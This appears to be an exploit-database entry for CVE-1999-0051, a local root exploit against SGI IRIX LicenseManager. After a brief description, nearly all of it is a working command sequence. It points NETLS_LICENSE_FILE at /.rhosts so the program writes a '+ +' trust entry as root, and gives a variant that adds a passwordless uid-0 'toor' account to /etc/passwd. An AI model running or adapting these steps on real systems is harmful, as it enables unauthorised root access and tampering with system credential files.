SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability. CVE-1999-0051. Local exploit for irix platform
source: http://www.securityfocus.com/bid/72/info Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to overwrite root-owned files allowing root access. % setenv NETLS_LICENSE_FILE /.rhosts % /usr/etc/LicenseManager & Install... NetLS Node-locked Vendor Name: whatever Vendor ID: + + Product name: whatever License version: 1.000 License version: Expiration date: 01-jan-0 (in license version field put a space) Apply License(s) succesfully installed % cat /.rhosts #:# "whatever" "whatever" "1.000" "Incomplete" + + If your system has remote root logins disabled, replacing /.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh.